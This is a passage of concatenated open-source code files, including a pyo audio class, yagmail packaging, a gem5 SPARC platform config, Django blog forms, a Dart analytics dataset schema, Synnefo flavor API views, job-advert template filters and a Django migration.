>>> b = SineLoop(freq=fr*1.005, feedback=0.08, mul=.3).out(1)
>>> def pick_new_freq():
... fr.value = random.randrange(200,501,50)
>>> pat = Pattern(function=pick_new_freq, time=1).play()
"""
def __init__(self, value, time=0.025, init=0.0, mul=1, add=0):
pyoArgsAssert(self, "OnnOO", value, time, init, mul, add)
PyoObject.__init__(self, mul, add)
self._value = value
self._time = time
value, time, init, mul ,add, lmax = convertArgsToLists(value, time, init, mul, add)
self._base_objs = [SigTo_base(wrap(value,i), wrap(time,i), wrap(init,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
def setValue(self, x):
"""
Changes the value of the signal stream.
:Args:
x : float or PyoObject
Numerical value to convert.
"""
pyoArgsAssert(self, "O", x)
self._value = x
x, lmax = convertArgsToLists(x)
[obj.setValue(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setTime(self, x):
"""
Changes the ramp time of the object.
:Args:
x : float
New ramp time.
"""
pyoArgsAssert(self, "n", x)
self._time = x
x, lmax = convertArgsToLists(x)
[obj.setTime(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def ctrl(self, map_list=None, title=None, wxnoserver=False):
self._map_list = [SLMap(0, 10, 'lin', 'time', self._time, dataOnly=True)]
PyoObject.ctrl(self, map_list, title, wxnoserver)
@property
def value(self):
"""float or PyoObject. Numerical value to convert."""
return self._value
@value.setter
def value(self, x): self.setValue(x)
@property
def time(self):
"""float. Ramp time."""
return self._time
@time.setter
def time(self, x): self.setTime(x) | gpl-3.0 |
kootenpv/yagmail | setup.py | 1 | 2037 | from setuptools import setup
from setuptools import find_packages
with open('README.rst') as f:
LONG_DESCRIPTION = f.read()
MAJOR_VERSION = '0'
MINOR_VERSION = '14'
MICRO_VERSION = '247'
VERSION = "{}.{}.{}".format(MAJOR_VERSION, MINOR_VERSION, MICRO_VERSION)
setup(
name='yagmail',
version=VERSION,
description='Yet Another GMAIL client',
long_description=LONG_DESCRIPTION,
url='https://github.com/kootenpv/yagmail',
author='Pascal van Kooten',
author_email='[email protected]',
license='MIT',
extras_require={"all": ["keyring"]},
install_requires=["premailer"],
keywords='email mime automatic html attachment',
entry_points={'console_scripts': ['yagmail = yagmail.__main__:main']},
classifiers=[
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: Customer Service',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Operating System :: Microsoft',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Unix',
'Operating System :: POSIX',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Communications :: Email',
'Topic :: Communications :: Email :: Email Clients (MUA)',
'Topic :: Software Development',
'Topic :: Software Development :: Build Tools',
'Topic :: Software Development :: Debuggers',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: System :: Software Distribution',
'Topic :: System :: Systems Administration',
'Topic :: Utilities',
],
packages=find_packages(),
zip_safe=False,
platforms='any',
)
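# Usage sketch for the package this script installs; the credentials and
# addresses below are placeholders:
#
#   import yagmail
#   yag = yagmail.SMTP('me@gmail.com', 'app-password')
#   yag.send(to='you@example.com', subject='hi', contents='sent via yagmail')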
| mit |
jtyuan/racetrack | src/dev/sparc/T1000.py | 66 | 5810 | # Copyright (c) 2006-2007 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
from m5.params import *
from m5.proxy import *
from Device import BasicPioDevice, PioDevice, IsaFake, BadAddr
from Platform import Platform
from Terminal import Terminal
from Uart import Uart8250
class MmDisk(BasicPioDevice):
type = 'MmDisk'
cxx_header = "dev/sparc/mm_disk.hh"
image = Param.DiskImage("Disk Image")
pio_addr = 0x1F40000000
class DumbTOD(BasicPioDevice):
type = 'DumbTOD'
cxx_header = "dev/sparc/dtod.hh"
time = Param.Time('01/01/2009', "System time to use ('Now' for real time)")
pio_addr = 0xfff0c1fff8
class Iob(PioDevice):
type = 'Iob'
cxx_header = "dev/sparc/iob.hh"
platform = Param.Platform(Parent.any, "Platform this device is part of.")
    pio_latency = Param.Latency('1ns', "Programmed I/O latency")
class T1000(Platform):
type = 'T1000'
cxx_header = "dev/sparc/t1000.hh"
system = Param.System(Parent.any, "system")
fake_clk = IsaFake(pio_addr=0x9600000000, pio_size=0x100000000)
#warn_access="Accessing Clock Unit -- Unimplemented!")
fake_membnks = IsaFake(pio_addr=0x9700000000, pio_size=16384,
ret_data64=0x0000000000000000, update_data=False)
#warn_access="Accessing Memory Banks -- Unimplemented!")
fake_jbi = IsaFake(pio_addr=0x8000000000, pio_size=0x100000000)
#warn_access="Accessing JBI -- Unimplemented!")
fake_l2_1 = IsaFake(pio_addr=0xA900000000, pio_size=0x8,
ret_data64=0x0000000000000001, update_data=True)
#warn_access="Accessing L2 Cache Banks -- Unimplemented!")
fake_l2_2 = IsaFake(pio_addr=0xA900000040, pio_size=0x8,
ret_data64=0x0000000000000001, update_data=True)
#warn_access="Accessing L2 Cache Banks -- Unimplemented!")
fake_l2_3 = IsaFake(pio_addr=0xA900000080, pio_size=0x8,
ret_data64=0x0000000000000001, update_data=True)
#warn_access="Accessing L2 Cache Banks -- Unimplemented!")
fake_l2_4 = IsaFake(pio_addr=0xA9000000C0, pio_size=0x8,
ret_data64=0x0000000000000001, update_data=True)
#warn_access="Accessing L2 Cache Banks -- Unimplemented!")
fake_l2esr_1 = IsaFake(pio_addr=0xAB00000000, pio_size=0x8,
ret_data64=0x0000000000000000, update_data=True)
#warn_access="Accessing L2 ESR Cache Banks -- Unimplemented!")
fake_l2esr_2 = IsaFake(pio_addr=0xAB00000040, pio_size=0x8,
ret_data64=0x0000000000000000, update_data=True)
#warn_access="Accessing L2 ESR Cache Banks -- Unimplemented!")
fake_l2esr_3 = IsaFake(pio_addr=0xAB00000080, pio_size=0x8,
ret_data64=0x0000000000000000, update_data=True)
#warn_access="Accessing L2 ESR Cache Banks -- Unimplemented!")
fake_l2esr_4 = IsaFake(pio_addr=0xAB000000C0, pio_size=0x8,
ret_data64=0x0000000000000000, update_data=True)
#warn_access="Accessing L2 ESR Cache Banks -- Unimplemented!")
fake_ssi = IsaFake(pio_addr=0xff00000000, pio_size=0x10000000)
#warn_access="Accessing SSI -- Unimplemented!")
hterm = Terminal()
hvuart = Uart8250(pio_addr=0xfff0c2c000)
htod = DumbTOD()
pterm = Terminal()
puart0 = Uart8250(pio_addr=0x1f10000000)
iob = Iob()
# Attach I/O devices that are on chip
def attachOnChipIO(self, bus):
self.iob.pio = bus.master
self.htod.pio = bus.master
# Attach I/O devices to specified bus object. Can't do this
# earlier, since the bus object itself is typically defined at the
# System level.
def attachIO(self, bus):
self.hvuart.terminal = self.hterm
self.puart0.terminal = self.pterm
self.fake_clk.pio = bus.master
self.fake_membnks.pio = bus.master
self.fake_l2_1.pio = bus.master
self.fake_l2_2.pio = bus.master
self.fake_l2_3.pio = bus.master
self.fake_l2_4.pio = bus.master
self.fake_l2esr_1.pio = bus.master
self.fake_l2esr_2.pio = bus.master
self.fake_l2esr_3.pio = bus.master
self.fake_l2esr_4.pio = bus.master
self.fake_ssi.pio = bus.master
self.fake_jbi.pio = bus.master
self.puart0.pio = bus.master
self.hvuart.pio = bus.master
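# Illustrative wiring, not part of this file: a full-system SPARC config
# would typically instantiate and attach the platform roughly like this
# (the bus names are assumptions).
#
#   system.platform = T1000()
#   system.platform.attachOnChipIO(system.membus)
#   system.platform.attachIO(system.iobus)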
| bsd-3-clause |
NadaBayoumy/DjangoPythonBlog | Blog/BlogApp/forms.py | 1 | 2667 | #nada
from django import forms
from .models import Category
from .models import ForbiddenWords
from .models import Post
from django import forms
#end nada
#alem
from .models import Post, Reply
#end alem
#hossam
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
#end hossam
#simona
from django.forms.widgets import Widget
from django.contrib.auth.forms import UserCreationForm
#end simona
#nada
class CategoryForm(forms.ModelForm):
class Meta:
model=Category
fields=('categoryName',)
class ForbiddenWordsForm(forms.ModelForm):
class Meta:
model=ForbiddenWords
fields=('forbiddenWord',)
class PostForm(forms.ModelForm):
class Meta:
model=Post
fields=('postTitle','postPic','postContent','userID','postCategory')
#endnada
#alem
class Post_Form(forms.ModelForm):
class Meta:
model = Post
fields = ('postTitle', 'postPic', 'postContent')#'userID', 'postCategory')
class Comment_Form(forms.ModelForm):
class Meta:
model = Reply
fields = ('replyContent',)
#end alem
#hossam
class CreateUserForm(UserCreationForm):
class Meta:
model = User
fields = ('username', 'first_name', 'last_name', 'email', 'password1', 'password2', 'is_staff', 'is_active', 'is_superuser')
class EditUserForm(forms.ModelForm):
class Meta:
model = User
fields = ('username', 'first_name', 'last_name', 'email', 'is_staff', 'is_active', 'is_superuser')
class ChangePwForm(UserCreationForm):
username = forms.CharField(widget=forms.TextInput(attrs={'readonly': 'readonly'}), help_text="This is a disabled field.")
class Meta:
model = User
fields = ('username', 'password1', 'password2')
#end hossam
#simona
class RegistrationForm(UserCreationForm):
class Meta:
model =User
fields=['username','email','first_name','last_name','password1', 'password2']
def clean_email(self):
clean_data = super(RegistrationForm, self).clean()
email=clean_data.get('email')
if User.objects.filter(email=email).count() > 0:
raise forms.ValidationError("this email is already in use")
print("clean_email")
return email
def clean_username(self):
clean_data = super(RegistrationForm, self).clean()
name=clean_data.get('username')
return name
#end simona
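# Usage sketch (the view below is illustrative, not part of this module):
# validation hooks such as RegistrationForm.clean_email run when the view
# calls form.is_valid().
#
#   def register(request):
#       form = RegistrationForm(request.POST or None)
#       if request.method == 'POST' and form.is_valid():
#           form.save()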
| gpl-2.0 |
bravo-zhang/spark | python/pyspark/mllib/__init__.py | 123 | 1412 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
RDD-based machine learning APIs for Python (in maintenance mode).
The `pyspark.mllib` package is in maintenance mode as of the Spark 2.0.0 release to encourage
migration to the DataFrame-based APIs under the `pyspark.ml` package.
"""
from __future__ import absolute_import
# MLlib currently needs NumPy 1.4+, so complain if lower
import numpy
ver = [int(x) for x in numpy.version.version.split('.')[:2]]
if ver < [1, 4]:
raise Exception("MLlib requires NumPy 1.4+")
__all__ = ['classification', 'clustering', 'feature', 'fpm', 'linalg', 'random',
'recommendation', 'regression', 'stat', 'tree', 'util']
| apache-2.0 |
RetailMeNotSandbox/dart | src/python/dart/client/python/examples/datasets/owen_outclick_us_v02.py | 1 | 14227 | from dart.client.python.dart_client import Dart
from dart.model.dataset import Column, DatasetData, Dataset, DataFormat, FileFormat, RowFormat, DataType, Compression, \
LoadType
if __name__ == '__main__':
dart = Dart('localhost', 5000)
assert isinstance(dart, Dart)
dataset = dart.save_dataset(Dataset(data=(DatasetData(
name='owen_outclick_us_v02',
description='Owen outclick data, based on overlord schema version. Considered a replacement for outclick events.',
table_name='outclick',
location='s3://example-bucket/prd/inbound/overlord/raw-firehose-02/rmn-outclicks',
load_type=LoadType.MERGE,
data_format=DataFormat(
file_format=FileFormat.TEXTFILE,
row_format=RowFormat.JSON,
),
compression=Compression.GZIP,
partitions=[
Column('year', DataType.STRING),
Column('month', DataType.STRING),
Column('day', DataType.STRING),
],
primary_keys=['eventInstanceUuid'],
merge_keys=['eventInstanceUuid'],
sort_keys=['eventTimestamp', 'eventInstanceUuid', 'derivedEventInstanceId'],
distribution_keys=['eventInstanceUuid'],
batch_merge_sort_keys=['owenProcessed DESC'],
columns=[
Column('advertiserUuid', DataType.VARCHAR, length=2048, path='owen.context.advertiserUuid'),
Column('appBadgeCount', DataType.INT, path='owen.context.appBadgeCount'),
Column('appForegroundFlag', DataType.BOOLEAN, path='owen.context.appForegroundFlag'),
Column('bluetoothBeaconId', DataType.VARCHAR, length=50, path='owen.context.bluetoothBeaconId'),
Column('bluetoothBeaconType', DataType.VARCHAR, length=25, path='owen.context.bluetoothBeaconType'),
Column('bluetoothEnabledFlag', DataType.BOOLEAN, path='owen.context.bluetoothEnabledFlag'),
Column('breadCrumb', DataType.VARCHAR, length=2048, path='owen.context.breadCrumb'),
Column('browserFamily', DataType.VARCHAR, length=50, path='owen.context.browserFamily'),
Column('browserVersion', DataType.VARCHAR, length=50, path='owen.context.browserVersion'),
Column('carrier', DataType.VARCHAR, length=25, path='owen.context.carrier'),
Column('city', DataType.VARCHAR, length=75, path='owen.context.city'),
Column('connectionType', DataType.VARCHAR, length=25, path='owen.context.connectionType'),
Column('country', DataType.VARCHAR, length=2, path='owen.context.country'),
Column('custom', DataType.VARCHAR, path='owen.context.custom'),
Column('deviceCategory', DataType.VARCHAR, length=2048, path='owen.context.deviceCategory'),
Column('deviceFingerprint', DataType.VARCHAR, length=26, path='owen.context.deviceFingerprint'),
Column('dma', DataType.INT, path='owen.context.dma'),
Column('environment', DataType.VARCHAR, length=2048, path='owen.context.environment'),
Column('experimentObject', DataType.VARCHAR, length=1024, path='owen.context.experiment'),
Column('failureFlag', DataType.BOOLEAN, path='owen.context.failureFlag'),
Column('failureReason', DataType.VARCHAR, length=2048, path='owen.context.failureReason'),
Column('favoriteFlag', DataType.BOOLEAN, path='owen.context.favoriteFlag'),
Column('featureFlags', DataType.VARCHAR, path='owen.context.featureFlags'),
Column('geofenceUuid', DataType.VARCHAR, length=2048, path='owen.context.geofenceUuid'),
Column('inventoryCount', DataType.INT, path='owen.context.inventoryCount'),
Column('inventory_affiliateNetwork', DataType.VARCHAR, length=50, path='owen.context.inventory[0].affiliateNetwork'),
Column('inventory_brand', DataType.VARCHAR, length=100, path='owen.context.inventory[0].brand'),
Column('inventory_claimUuid', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].claimUuid'),
Column('inventory_clickLocation', DataType.VARCHAR, length=100, path='owen.context.inventory[0].clickLocation'),
Column('inventory_commentsCount', DataType.INT, path='owen.context.inventory[0].commentsCount'),
Column('inventory_conquestingFlag', DataType.BOOLEAN, path='owen.context.inventory[0].conquestingFlag'),
Column('inventory_couponRank', DataType.NUMERIC, precision=18, scale=4, path='owen.context.inventory[0].couponRank'),
Column('inventory_deepLinkUrl', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].deepLinkUrl'),
Column('inventory_deepLinkUrlScheme', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].deepLinkUrlScheme'),
Column('inventory_exclusivityFlag', DataType.BOOLEAN, path='owen.context.inventory[0].exclusivityFlag'),
Column('inventory_expirationDate', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].expirationDate'),
Column('inventory_finalPrice', DataType.NUMERIC, precision=18, scale=4, path='owen.context.inventory[0].finalPrice'),
Column('inventory_instoreType', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].instoreType'),
Column('inventory_inventoryChannel', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].inventoryChannel'),
Column('inventory_inventoryName', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].inventoryName'),
Column('inventory_inventorySource', DataType.VARCHAR, length=50, path='owen.context.inventory[0].inventorySource'),
Column('inventory_inventoryType', DataType.VARCHAR, length=25, path='owen.context.inventory[0].inventoryType'),
Column('inventory_inventoryUuid', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].inventoryUuid'),
Column('inventory_lastVerifiedDate', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].lastVerifiedDate'),
Column('inventory_monetizableFlag', DataType.BOOLEAN, path='owen.context.inventory[0].monetizableFlag'),
Column('inventory_noVotes', DataType.INT, path='owen.context.inventory[0].noVotes'),
Column('inventory_onlineType', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].onlineType'),
Column('inventory_originalPrice', DataType.NUMERIC, precision=18, scale=4, path='owen.context.inventory[0].originalPrice'),
Column('inventory_outRedirectUrl', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].outRedirectUrl'),
Column('inventory_outclickUuid', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].outclickUuid'),
Column('inventory_parentInventoryUuid', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].parentInventoryUuid'),
Column('inventory_personalizationFlag', DataType.BOOLEAN, path='owen.context.inventory[0].personalizationFlag'),
Column('inventory_position', DataType.INT, path='owen.context.inventory[0].position'),
Column('inventory_proximity', DataType.NUMERIC, precision=18, scale=4, path='owen.context.inventory[0].proximity'),
Column('inventory_proximityUnit', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].proximityUnit'),
Column('inventory_recommendedFlag', DataType.BOOLEAN, path='owen.context.inventory[0].recommendedFlag'),
Column('inventory_redemptionChannel', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].redemptionChannel'),
Column('inventory_retailCategory', DataType.VARCHAR, length=75, path='owen.context.inventory[0].retailCategory'),
Column('inventory_savedFlag', DataType.BOOLEAN, path='owen.context.inventory[0].savedFlag'),
Column('inventory_siteUuid', DataType.VARCHAR, length=26, path='owen.context.inventory[0].siteUuid'),
Column('inventory_startDate', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].startDate'),
Column('inventory_successPercentage', DataType.NUMERIC, precision=18, scale=4, path='owen.context.inventory[0].successPercentage'),
Column('inventory_usedByCount', DataType.INT, path='owen.context.inventory[0].usedByCount'),
Column('inventory_yesVotes', DataType.INT, path='owen.context.inventory[0].yesVotes'),
Column('ipAddress', DataType.VARCHAR, length=45, path='owen.context.ipAddress'),
Column('language', DataType.VARCHAR, length=6, path='owen.context.language'),
Column('latitude', DataType.NUMERIC, precision=18, scale=4, path='owen.context.latitude'),
Column('locationEnabledFlag', DataType.BOOLEAN, path='owen.context.locationEnabledFlag'),
Column('loggedInFlag', DataType.BOOLEAN, path='owen.context.loggedInFlag'),
Column('longitude', DataType.NUMERIC, precision=18, scale=4, path='owen.context.longitude'),
Column('macAddress', DataType.VARCHAR, length=2048, path='owen.context.macAddress'),
Column('marketing_adGroup', DataType.VARCHAR, length=2048, path='owen.context.marketing.adGroup'),
Column('marketing_campaign', DataType.VARCHAR, length=50, path='owen.context.marketing.campaign'),
Column('marketing_campaignSendCount', DataType.INT, path='owen.context.marketing.campaignSendCount'),
Column('marketing_campaignUuid', DataType.VARCHAR, length=2048, path='owen.context.marketing.campaignUuid'),
Column('marketing_cdRank', DataType.INT, path='owen.context.marketing.cdRank'),
Column('marketing_channel', DataType.VARCHAR, length=50, path='owen.context.marketing.channel'),
Column('marketing_content', DataType.VARCHAR, length=2048, path='owen.context.marketing.content'),
Column('marketing_medium', DataType.VARCHAR, length=50, path='owen.context.marketing.medium'),
Column('marketing_notificationUuid', DataType.VARCHAR, length=2048, path='owen.context.marketing.notificationUuid'),
Column('marketing_source', DataType.VARCHAR, length=100, path='owen.context.marketing.source'),
Column('marketing_term', DataType.VARCHAR, length=2048, path='owen.context.marketing.term'),
Column('marketing_vendor', DataType.VARCHAR, length=25, path='owen.context.marketing.vendor'),
Column('mobileDeviceMake', DataType.VARCHAR, length=25, path='owen.context.mobileDeviceMake'),
Column('mobileDeviceModel', DataType.VARCHAR, length=50, path='owen.context.mobileDeviceModel'),
Column('notificationEnabledFlag', DataType.BOOLEAN, path='owen.context.notificationEnabledFlag'),
Column('osFamily', DataType.VARCHAR, length=25, path='owen.context.osFamily'),
Column('osName', DataType.VARCHAR, length=2048, path='owen.context.osName'),
Column('osVersion', DataType.VARCHAR, length=2048, path='owen.context.osVersion'),
Column('pageName', DataType.VARCHAR, length=2048, path='owen.context.pageName'),
Column('pageType', DataType.VARCHAR, length=100, path='owen.context.pageType'),
Column('partialSearchTerm', DataType.VARCHAR, length=2048, path='owen.context.partialSearchTerm'),
Column('personalizationFlag', DataType.BOOLEAN, path='owen.context.personalizationFlag'),
Column('previousPageName', DataType.VARCHAR, length=2048, path='owen.context.previousPageName'),
Column('previousViewInstanceUuid', DataType.VARCHAR, length=2048, path='owen.context.previousViewInstanceUuid'),
Column('promptName', DataType.VARCHAR, length=2048, path='owen.context.promptName'),
Column('propertyName', DataType.VARCHAR, length=20, path='owen.context.propertyName'),
Column('referrer', DataType.VARCHAR, length=2048, path='owen.context.referrer'),
Column('region', DataType.VARCHAR, length=25, path='owen.context.region'),
Column('screenHeight', DataType.INT, path='owen.context.screenHeight'),
Column('screenWidth', DataType.INT, path='owen.context.screenWidth'),
Column('session', DataType.VARCHAR, length=2048, path='owen.context.session'),
Column('test_testUuid', DataType.VARCHAR, length=26, path='owen.context.test.testUuid'),
Column('udid', DataType.VARCHAR, length=40, path='owen.context.udid'),
Column('userAgent', DataType.VARCHAR, length=2048, path='owen.context.userAgent'),
Column('userQualifier', DataType.VARCHAR, length=26, path='owen.context.userQualifier'),
Column('userUuid', DataType.VARCHAR, length=2048, path='owen.context.userUuid'),
Column('vendorObject', DataType.VARCHAR, length=512, path='owen.context.vendor'),
Column('viewInstanceUuid', DataType.VARCHAR, length=128, path='owen.context.viewInstanceUuid'),
Column('eventAction', DataType.VARCHAR, length=2048, path='owen.event.eventAction'),
Column('eventCategory', DataType.VARCHAR, length=25, path='owen.event.eventCategory'),
Column('eventInstanceUuid', DataType.VARCHAR, length=26, path='owen.event.eventInstanceUuid'),
Column('eventName', DataType.VARCHAR, length=50, path='owen.event.eventName'),
Column('eventPlatform', DataType.VARCHAR, length=25, path='owen.event.eventPlatform'),
Column('eventPlatformVersion', DataType.VARCHAR, length=25, path='owen.event.eventPlatformVersion'),
Column('eventTarget', DataType.VARCHAR, length=2048, path='owen.event.eventTarget'),
Column('eventVersion', DataType.VARCHAR, length=25, path='owen.event.eventVersion'),
Column('eventTimestamp', DataType.DATETIME, date_pattern="yyyy-MM-dd'T'HH:mm:ss'Z'", path='owen.event.eventTimestamp'),
Column('derivedEventInstanceId', DataType.VARCHAR, length=64, path='metadata.derivedEventInstanceId'),
Column('owenProcessed', DataType.DATETIME, date_pattern="yyyy-MM-dd'T'HH:mm:ss'Z'", path='metadata.analyticsTopologyFinishTime'),
],
))))
print 'created dataset: %s' % dataset.id
| mit |
AthinaB/synnefo | snf-cyclades-app/synnefo/api/flavors.py | 9 | 3419 | # Copyright (C) 2010-2014 GRNET S.A.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from logging import getLogger
from django.conf.urls import patterns
from django.http import HttpResponse
from django.template.loader import render_to_string
from django.utils import simplejson as json
from snf_django.lib import api
from synnefo.api import util
from synnefo.db.models import Flavor
log = getLogger('synnefo.api')
urlpatterns = patterns(
'synnefo.api.flavors',
(r'^(?:/|.json|.xml)?$', 'list_flavors'),
(r'^/detail(?:.json|.xml)?$', 'list_flavors', {'detail': True}),
(r'^/(\d+)(?:.json|.xml)?$', 'get_flavor_details'),
)
def flavor_to_dict(flavor, detail=True):
d = {'id': flavor.id, 'name': flavor.name}
d['links'] = util.flavor_to_links(flavor.id)
if detail:
d['ram'] = flavor.ram
d['disk'] = flavor.disk
d['vcpus'] = flavor.cpu
d['SNF:disk_template'] = flavor.volume_type.disk_template
d['SNF:volume_type'] = flavor.volume_type_id
d['SNF:allow_create'] = flavor.allow_create
return d
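# A sketch of the dict produced above (values illustrative, not from any
# real deployment):
#   {'id': 1, 'name': 'C1R1024D20drbd', 'links': [...],
#    'ram': 1024, 'disk': 20, 'vcpus': 1,
#    'SNF:disk_template': 'drbd', 'SNF:volume_type': 1,
#    'SNF:allow_create': True}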
@api.api_method(http_method='GET', user_required=True, logger=log)
def list_flavors(request, detail=False):
# Normal Response Codes: 200, 203
# Error Response Codes: computeFault (400, 500),
# serviceUnavailable (503),
# unauthorized (401),
# badRequest (400),
# overLimit (413)
log.debug('list_flavors detail=%s', detail)
active_flavors = Flavor.objects.select_related("volume_type")\
.exclude(deleted=True)
flavors = [flavor_to_dict(flavor, detail)
for flavor in active_flavors.order_by('id')]
if request.serialization == 'xml':
data = render_to_string('list_flavors.xml', {
'flavors': flavors,
'detail': detail})
else:
data = json.dumps({'flavors': flavors})
return HttpResponse(data, status=200)
@api.api_method(http_method='GET', user_required=True, logger=log)
def get_flavor_details(request, flavor_id):
# Normal Response Codes: 200, 203
# Error Response Codes: computeFault (400, 500),
# serviceUnavailable (503),
# unauthorized (401),
# badRequest (400),
# itemNotFound (404),
# overLimit (413)
log.debug('get_flavor_details %s', flavor_id)
flavor = util.get_flavor(flavor_id, include_deleted=True)
flavordict = flavor_to_dict(flavor, detail=True)
if request.serialization == 'xml':
data = render_to_string('flavor.xml', {'flavor': flavordict})
else:
data = json.dumps({'flavor': flavordict})
return HttpResponse(data, status=200)
| gpl-3.0 |
Doteveryone/BetterJobAdverts | jobcert/filters.py | 1 | 1556 | from jobcert import app
@app.template_filter('readability_words')
def readability_words_filter(s):
    # Flesch reading-ease bands: 90-100 is easiest, below 30 hardest.
    score = int(s)
    if score >= 90:
        return "Very Easy"
    elif score >= 80:
        return "Easy"
    elif score >= 70:
        return "Fairly Easy"
    elif score >= 60:
        return "Standard"
    elif score >= 50:
        return "Fairly Difficult"
    elif score >= 30:
        return "Difficult"
    else:
        return "Very Confusing"
@app.template_filter('trafficlight_status')
def trafficlight_status_filter(s):
    if s == 'clear':
        return "success"
    elif s == 'unclear':
        return "warning"
    else:
        return "alert"
@app.template_filter('boolean_status')
def boolean_status_filter(s):
if bool(s):
return "success"
else:
return "alert"
@app.template_filter('format_status')
def format_status_filter(s):
    if s == 'yes':
        return "success"
    elif s == 'incomplete':
        return "warning"
    else:
        return "alert"
@app.template_filter('readability_status')
def readability_status_filter(s):
    score = int(s)
    if score >= 60:
        return "success"
    elif score >= 30:
        return "warning"
    else:
        return "alert"
@app.template_filter('gender_coded_status')
def gender_coded_status_filter(s):
if s in ('feminine-coded', 'strongly feminine-coded', 'neutral'):
return "success"
else:
return "warning" | agpl-3.0 |
gwu-libraries/sfm-ui | sfm/ui/migrations/0021_auto_20180712_1310.py | 2 | 10258 | # Generated by Django 2.0.7 on 2018-07-12 17:10
import django.contrib.auth.validators
from django.db import migrations, models
import jsonfield.fields
class Migration(migrations.Migration):
dependencies = [
('ui', '0020_auto_20180608_1144'),
]
operations = [
migrations.AddField(
model_name='historicalcollection',
name='history_change_reason',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='historicalcollectionset',
name='history_change_reason',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='historicalcredential',
name='history_change_reason',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='historicalseed',
name='history_change_reason',
field=models.CharField(max_length=100, null=True),
),
migrations.AlterField(
model_name='collection',
name='end_date',
field=models.DateTimeField(blank=True, help_text='If blank, will continue until stopped.', null=True),
),
migrations.AlterField(
model_name='collection',
name='harvest_type',
field=models.CharField(choices=[('twitter_user_timeline', 'Twitter user timeline'), ('twitter_search', 'Twitter search'), ('twitter_filter', 'Twitter filter'), ('twitter_sample', 'Twitter sample'), ('tumblr_blog_posts', 'Tumblr blog posts'), ('flickr_user', 'Flickr user'), ('weibo_timeline', 'Weibo timeline')], max_length=255),
),
migrations.AlterField(
model_name='collection',
name='link',
field=models.CharField(blank=True, max_length=512, verbose_name='Public link'),
),
migrations.AlterField(
model_name='collection',
name='name',
field=models.CharField(max_length=255, verbose_name='Collection name'),
),
migrations.AlterField(
model_name='collection',
name='schedule_minutes',
